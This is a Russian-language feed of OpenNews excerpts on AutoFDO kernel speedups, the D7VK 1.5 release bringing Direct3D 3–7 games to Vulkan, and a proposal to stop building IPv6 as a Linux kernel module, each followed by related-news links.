В проведённых тестах включение AutoFDO для ядра привело к сокращению времени загрузки на 2.1%, ускорению первого запуска программ на 4.3%, повышению эффективности системных вызовов на 9.3%, сокращению времени выполнения mmap-транзакций Binder на 12.3%, HwBinder на 20% и Binder RPC на 21.7%.

1. Главная ссылка к новости
2. OpenNews: В ядро Linux 6.18 принята реализация Binder IPC для Android, написанная на Rust
3. OpenNews: Google оставит в Android возможность установки неверифицированных сторонних приложений
4. OpenNews: Oracle опубликовал систему автоматической оптимизации параметров ядра Linux
5. OpenNews: Проект Minotaur развивает оптимизатор векторных инструкций для LLVM
6. OpenNews: Представлен бэкенд TPDE-LLVM, работающий в 10-20 раз быстрее LLVM в режиме без оптимизации

В новом выпуске обеспечена экспериментальная поддержка графического API Direct3D 3 в дополнение к ранее доступной поддержке Direct3D 5, 6 и 7. Что касается, других версий Direct3D, то версия DirectX 1 не включала 3D-компоненты. API Direct3D появился в версии DirectX 2, которая по большому счёту аналогична DirectX 3 и взаимозаменяема. Версия DirectX 4 не была выпущена Microsoft и осталась в состоянии прототипа (следом за DirectX 3 сразу вышел DirectX 5). Поддержка Direct3D 8, 9, 10 и 11 предоставляется отдельным проектом DXVK.

В D7VK 1.5 также проведена работа по устранению ошибок и улучшению кода, предназначенного для обеспечения совместимости с играми, использующими Direct3D 5, 6 и 7. Реализована поддержка буферов исполнения (Execute buffers) для передачи команд GPU, возможность записи в кадровый буфер (Back buffer) и буфер глубины (Depth buffer), а также поддержка старого метода потоковой передачи вершинных буферов с обрамлением командами Begin и End.

Добавлена поддержка игр:

• Delta Force 2
• Empire of the Ants (2000)
• Frogger (1997)
• Gorky 17
• Ground Control
• Incoming
• Knight Rider
• MotoRacer2
• Need For Speed 3/4
• Nocturne
• O.D.T.: Escape... Or Die Trying
• Outlaws
• Radeon's Ark
• Rage Dawning
• SimCity 4
• Star Wars: Jedi Knight: Dark Forces II
• Star Wars: Shadows of the Empire
• Summoner
• Take No Prisoners
• The Mystery of the Druids
• Total Club Manager 2003
• Urban Chaos
• Venom. Codename: Outbreak
• Wing Commander: Prophecy

1. Главная ссылка к новости
2. OpenNews: Выпуск D7VK 1.3, реализации Direct3D 5, 6 и 7 поверх API Vulkan
3. OpenNews: Релиз Proton 10.0-4, пакета для запуска Windows-игр в Linux
4. OpenNews: Выпуск DXVK 2.7, реализации Direct3D 8/9/10/11 поверх API Vulkan
5. OpenNews: Выпуск DXVK-Sarek 1.11.0, реализации Direct3D 8/9/10/11 для GPU без поддержки Vulkan 1.3

Суть проблемы в том, что когда ядро поддерживает сборку IPv6 модулем ядра (CONFIG_IPV6=m), множество подсистем вынуждены добавлять бесполезные обработчики на случай выгрузки модуля IPv6. Поэтому предлагается ограничить выбор опциями для встраивания IPv6 в ядро (CONFIG_IPV6=y) и полного отключения IPv6 (CONFIG_IPV6=n), что избавит сетевую подсистему, BPF, Netfilter и некоторые драйверы от необходимости обработки выгрузки модуля.

1. Главная ссылка к новости
2. OpenNews: Для ядра Linux предложена файловая система DLMPFS
3. OpenNews: Охват IPv6 в Азиатско-Тихоокеанском регионе достиг 50%
4. OpenNews: Уязвимость в IPv6-стеке ядра Linux, допускающая удалённое выполнение кода
5. OpenNews: Оценка популярности IPv6 в трафике Cloudflare
6. OpenNews: В ядре Linux решена проблема с замедлением перехода в режим гибернации для старых SSD